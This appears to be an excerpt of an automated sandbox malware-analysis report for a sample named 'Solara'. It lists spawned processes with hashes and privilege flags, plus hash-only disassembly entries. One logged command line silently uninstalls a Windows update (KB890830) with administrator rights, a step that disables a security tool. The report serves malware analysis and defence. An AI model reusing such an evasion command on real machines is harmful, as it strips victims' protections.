                                                                                                  General

                                                                                                  Target ID:81
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:82
                                                                                                  Start time:01:11:07
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\wusa.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6f90b0000
                                                                                                  File size:345'088 bytes
                                                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:90
                                                                                                  Start time:01:11:08
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:122
                                                                                                  Start time:01:11:10
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:132
                                                                                                  Start time:01:11:11
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:158
                                                                                                  Start time:01:11:14
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:162
                                                                                                  Start time:01:11:14
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:173
                                                                                                  Start time:01:11:16
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:190
                                                                                                  Start time:01:11:18
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:237
                                                                                                  Start time:01:11:24
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:256
                                                                                                  Start time:01:11:28
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FFAAC340A21 Relevance: .5, Instructions: 516COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e4a90e4bfe29420a8fc0263b09bd98959657934b1bcf3e063fd44fdc6baa03e1
                                                                                                    • Instruction ID: 7f092239f0046bdca750dd0ccfff50aa2b01d56f9ec445a41d2746d44c036c08
                                                                                                    • Opcode Fuzzy Hash: e4a90e4bfe29420a8fc0263b09bd98959657934b1bcf3e063fd44fdc6baa03e1
                                                                                                    • Instruction Fuzzy Hash: 01F15030B199198FEB99EB28C554ABDB3A1FF59312F118679E41EC32D2CE34EC458790
                                                                                                    Function 00007FFAAC34065D Relevance: 3.0, Strings: 2, Instructions: 519COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: N_^$3CN_^
                                                                                                    • API String ID: 0-3209449023
                                                                                                    • Opcode ID: 398dcf14cb2f98c5bb668d2a26af58a6fa2fa85fb075e7cfae0bee5910d88bc8
                                                                                                    • Instruction ID: 5d6feb7c3dd37dfd6a9518cdee88b8395beb26f1aa7a74e278e1809148f031e2
                                                                                                    • Opcode Fuzzy Hash: 398dcf14cb2f98c5bb668d2a26af58a6fa2fa85fb075e7cfae0bee5910d88bc8
                                                                                                    • Instruction Fuzzy Hash: CF31EA52E0EB828BF611637CD9669E57F60DF93226F0841B7D18DC61E3DD0DA40A83E1
                                                                                                    Function 00007FFAAC3415AD Relevance: .5, Instructions: 526COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e0bec0b30b5c71cc8d30bf054543c7b288fa14e500bebb320e2ce1a13f4ba689
                                                                                                    • Instruction ID: 703ced0e6fce63863b0cf1a4adf9971cd4ab12a1fc7b1787d6f00c710aa1aaca
                                                                                                    • Opcode Fuzzy Hash: e0bec0b30b5c71cc8d30bf054543c7b288fa14e500bebb320e2ce1a13f4ba689
                                                                                                    • Instruction Fuzzy Hash: B9C12852B1DE858FF798AB38C859BA8BBD1FFA5311F0841BAD54DC3293DD28984483D1
                                                                                                    Function 00007FFAAC3404A8 Relevance: .3, Instructions: 324COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4b5b9cf6e8930dc60d0e80fdb66481f04659be6b975880477069e3c95141e9b3
                                                                                                    • Instruction ID: 8751e7e3c4f74044618ce87e3ae04749bb409740601cb184a2c403def269eba9
                                                                                                    • Opcode Fuzzy Hash: 4b5b9cf6e8930dc60d0e80fdb66481f04659be6b975880477069e3c95141e9b3
                                                                                                    • Instruction Fuzzy Hash: D9A10461B18E494FF788EB3CC859BB8BBD2EF99311F084179D54EC3292DD28984587D1
                                                                                                    Function 00007FFAAC341B1E Relevance: .1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6ed5427af39b0f1aad84489ede2032ebae481df8472521d98e5c07c33943667c
                                                                                                    • Instruction ID: ce5af8055417fd8513fc3e8ea570dd9ff812549d088db4ddeb1e0c8aace33094
                                                                                                    • Opcode Fuzzy Hash: 6ed5427af39b0f1aad84489ede2032ebae481df8472521d98e5c07c33943667c
                                                                                                    • Instruction Fuzzy Hash: FE313B61909B8E8FE78297A8D8515FDBFF1EF87211F0440BAC00ED75A7CD1C580683A1
                                                                                                    Function 00007FFAAC3411B9 Relevance: .1, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0e989e2886fa204d1dc31cf71b677cd081b9fbb41f365f11e667ba0c576abbc7
                                                                                                    • Instruction ID: ca56e5e848db5cf7b8de903386127ba51b23786aa2c23470effce89893d5bbaf
                                                                                                    • Opcode Fuzzy Hash: 0e989e2886fa204d1dc31cf71b677cd081b9fbb41f365f11e667ba0c576abbc7
                                                                                                    • Instruction Fuzzy Hash: F421A475A68D994FE795EB3CC461AB9B7D5FF99304B0441B6D00EC32A2DE28AC0587D0
                                                                                                    Function 00007FFAAC341C69 Relevance: .1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3167d0321e9736f7cb44ee425736880004ceaac8f03ecaede1edaecb65a981b1
                                                                                                    • Instruction ID: d273cc4f5990a090e11a35179fe96a0b63b66ce5f47d45804fca83f7e0ee1862
                                                                                                    • Opcode Fuzzy Hash: 3167d0321e9736f7cb44ee425736880004ceaac8f03ecaede1edaecb65a981b1
                                                                                                    • Instruction Fuzzy Hash: 4121B471B09A588FE755BB38C4956B977A1FF8A305F0041FAE00EC3292DE2DDC458381
                                                                                                    Function 00007FFAAC3412A9 Relevance: .1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4706fd74fa7fad6d64fefcf23a45cdf36a86da50694b3b57972883124ef5d43
                                                                                                    • Instruction ID: b018e8f5067fa67cb8bb92f0c58dffbd30e3b02577ec2d95402606c03221d131
                                                                                                    • Opcode Fuzzy Hash: b4706fd74fa7fad6d64fefcf23a45cdf36a86da50694b3b57972883124ef5d43
                                                                                                    • Instruction Fuzzy Hash: 86115C52A4ED850FF354A37C98679F1BBD5DB9722170541B6D14DC3193DC0C9C8783A1
                                                                                                    Function 00007FFAAC3404C0 Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a7a9b1bfd1817d84694c227077304afe40e646e3b7f07dcab90534ebc3ec76a1
                                                                                                    • Instruction ID: bd471af454c6cfab2a51a612f46e57984fd69d4f1aa809390e50c0922226a1e2
                                                                                                    • Opcode Fuzzy Hash: a7a9b1bfd1817d84694c227077304afe40e646e3b7f07dcab90534ebc3ec76a1
                                                                                                    • Instruction Fuzzy Hash: FC116075A28D594BE795FB3CC451AB9B395FB99304F0045B9D00EC36A2DE28A8058790
                                                                                                    Function 00007FFAAC3404C8 Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93ea5ae74571c36c3cc2057543e39ac6e9513cab2f6f1f69674dffdd38a094fa
                                                                                                    • Instruction ID: f8a055658b22fde9ba609ceddf79c9f96c6fa54ea8d10b4b3a6dffbbc616eaa0
                                                                                                    • Opcode Fuzzy Hash: 93ea5ae74571c36c3cc2057543e39ac6e9513cab2f6f1f69674dffdd38a094fa
                                                                                                    • Instruction Fuzzy Hash: 7B11A331715D1C8FE765BB38C455BB97295FB89306F0045BAE00ED3292DE29DC458780
                                                                                                    Function 00007FFAAC3404B0 Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: afde3b4e0a93d2a2053665e55ec768a6ae922be14111a181ab85c3ee77d1ec0b
                                                                                                    • Instruction ID: b86baa08082fcdedafc33af0633d1eedb75b8ff9432f4a3da6455f4036bd020a
                                                                                                    • Opcode Fuzzy Hash: afde3b4e0a93d2a2053665e55ec768a6ae922be14111a181ab85c3ee77d1ec0b
                                                                                                    • Instruction Fuzzy Hash: 18F02D02F09D090BF7A8B57D9499AB5B7C5D7DA221B404179E10DC2292DC08DC464390
                                                                                                    Function 00007FFAAC3409E6 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 55835af90a46c5b747b51da8f2beabaf701851d748f74669053c4a5f2eac072b
                                                                                                    • Instruction ID: de08d4dad482dff1c0499f2151a403b27d77787ab54a2f10db75d5a9d00276c5
                                                                                                    • Opcode Fuzzy Hash: 55835af90a46c5b747b51da8f2beabaf701851d748f74669053c4a5f2eac072b
                                                                                                    • Instruction Fuzzy Hash: E8E0CD10B18A154BE784F62CD441D7973D1D7A4754F444074F80DC32A5CD1CDB8143C1

                                                                                                    Executed Functions

                                                                                                    Function 00007FFAAC41660A Relevance: .4, Instructions: 425COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bcd5d1d9d0747b166c89bb63afab52cdef1530c9d073342bdb9c367b12712e3d
                                                                                                    • Instruction ID: 67790b15dae193504b1e92710bcdbb1735b96a20254191193f4653304671ef67
                                                                                                    • Opcode Fuzzy Hash: bcd5d1d9d0747b166c89bb63afab52cdef1530c9d073342bdb9c367b12712e3d
                                                                                                    • Instruction Fuzzy Hash: 87C15862D4EB8A8FF755DB6888195F9BBE0EF02218B0841BED58DC70D3DA18D809C3C5
                                                                                                    Function 00007FFAAC349EFB Relevance: .3, Instructions: 262COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 702c9f9d6bf47194a1354e9306691208737afffedd09ebbaab158abb8f93f643
                                                                                                    • Instruction ID: b7ac3ddad40f53fe79dcd630e6db920d2771d078b5bda0175ed4860c25ef18c0
                                                                                                    • Opcode Fuzzy Hash: 702c9f9d6bf47194a1354e9306691208737afffedd09ebbaab158abb8f93f643
                                                                                                    • Instruction Fuzzy Hash: F571316390AB868FF705975CE8768F97F50DF52227B0C83B3D48D8A1A3FD14645A46E0
                                                                                                    Function 00007FFAAC416647 Relevance: .3, Instructions: 258COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cd40463a169b0cfeb9af2d093830cf1f6d7cf8831dfe786e5dd88440f7297497
                                                                                                    • Instruction ID: 79dd216baad71dbe0fde65e3238285e86e023dcf071b5d1710c93cc8f285f19f
                                                                                                    • Opcode Fuzzy Hash: cd40463a169b0cfeb9af2d093830cf1f6d7cf8831dfe786e5dd88440f7297497
                                                                                                    • Instruction Fuzzy Hash: 5E811466D4FB868FF795DB6848695B8BAD0EF02218B1881FED58DCB0C3C918DC0983C5
                                                                                                    Function 00007FFAAC349758 Relevance: .1, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e205bf163a2df8b39513673f97e020b0675b669ff2610936f703cf707934f13c
                                                                                                    • Instruction ID: f411d823db888aa713944219ed69b4720d9412307416f630693eb65d12728848
                                                                                                    • Opcode Fuzzy Hash: e205bf163a2df8b39513673f97e020b0675b669ff2610936f703cf707934f13c
                                                                                                    • Instruction Fuzzy Hash: B0310C7190CF488FEB58DB5CEC46AA97BE0FB99311F10822FE04D93252DA30A855C7C2
                                                                                                    Function 00007FFAAC22E620 Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460192107.00007FFAAC22D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC22D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac22d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 38433f0ba7f99cce66993b48f78a5a29b5a4c4b77ac2755da4b0cda258729daa
                                                                                                    • Instruction ID: 3d33052aad600e2e82f6729997ae7616ad4ede9d141131afa13c134a12488b92
                                                                                                    • Opcode Fuzzy Hash: 38433f0ba7f99cce66993b48f78a5a29b5a4c4b77ac2755da4b0cda258729daa
                                                                                                    • Instruction Fuzzy Hash: 9741257040DBC48FE7569B2998459623FF0EF57320F1505DFE088CB1A7D629E84AC792
                                                                                                    Function 00007FFAAC34A47C Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c023b0ffdf097fa6af164026801078a9a1e03581662be439f1f0a06a12c035a3
                                                                                                    • Instruction ID: 0271e6791920a9b3d5bb0b9134fc27c67e7844fb7ecdbded287a0d8cf6f292f9
                                                                                                    • Opcode Fuzzy Hash: c023b0ffdf097fa6af164026801078a9a1e03581662be439f1f0a06a12c035a3
                                                                                                    • Instruction Fuzzy Hash: 5D21283190CB4C8FEB59DBACD84A7E97FE0EB96321F04416FD048C3152DA74945ACBA2
                                                                                                    Function 00007FFAAC3433B5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction ID: 20e8a060b539b53db3fc0320dd1806c5da9e29431e4e39bc3b3edf9bb3233b1d
                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction Fuzzy Hash: C201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                                                    Function 00007FFAAC41414D Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e9501c9666cb96d69163b01ad674e9e03a63af73ad085eab9dc77d9e935bb40c
                                                                                                    • Instruction ID: cc3f163dab0cddd16f152d057789c92e49bfcb4f1806716b55ea64343dfdc7aa
                                                                                                    • Opcode Fuzzy Hash: e9501c9666cb96d69163b01ad674e9e03a63af73ad085eab9dc77d9e935bb40c
                                                                                                    • Instruction Fuzzy Hash: 57F0BE32A4D5458FE758EB5CE4498E873E0EF5633471140BAE09DC71A3CE26EC44C784
                                                                                                    Function 00007FFAAC414400 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad16d1a489d4d1946dad305ab876ede24c962f7433bb83db4774ed3a96d54777
                                                                                                    • Instruction ID: 8aad8a823dab37e3164fe2bf633ba2bf588aefb353e00e82f66df03a3f92150c
                                                                                                    • Opcode Fuzzy Hash: ad16d1a489d4d1946dad305ab876ede24c962f7433bb83db4774ed3a96d54777
                                                                                                    • Instruction Fuzzy Hash: 58F0E232A4D5448FE758EB5CE0458E8B7E0FF0532474140B6E08DC7063CB26EC44C780
                                                                                                    Function 00007FFAAC4141D1 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                    • Instruction ID: baf56015c9a8f49d95357cac2ce78598e73253783a323b91ec9f66ea4b70a3e2
                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                    • Instruction Fuzzy Hash: E4E01A31B8C809CFEAA8DB0CE0489E973E1EB9933571151B7D18EC7561CA22EC559BC4

                                                                                                    Executed Functions

                                                                                                    Function 00007FF6284A1140 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.1533330740.00007FF6284A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6284A0000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.1533250834.00007FF6284A0000.00000002.00000001.01000000.00000009.sdmpDownload File
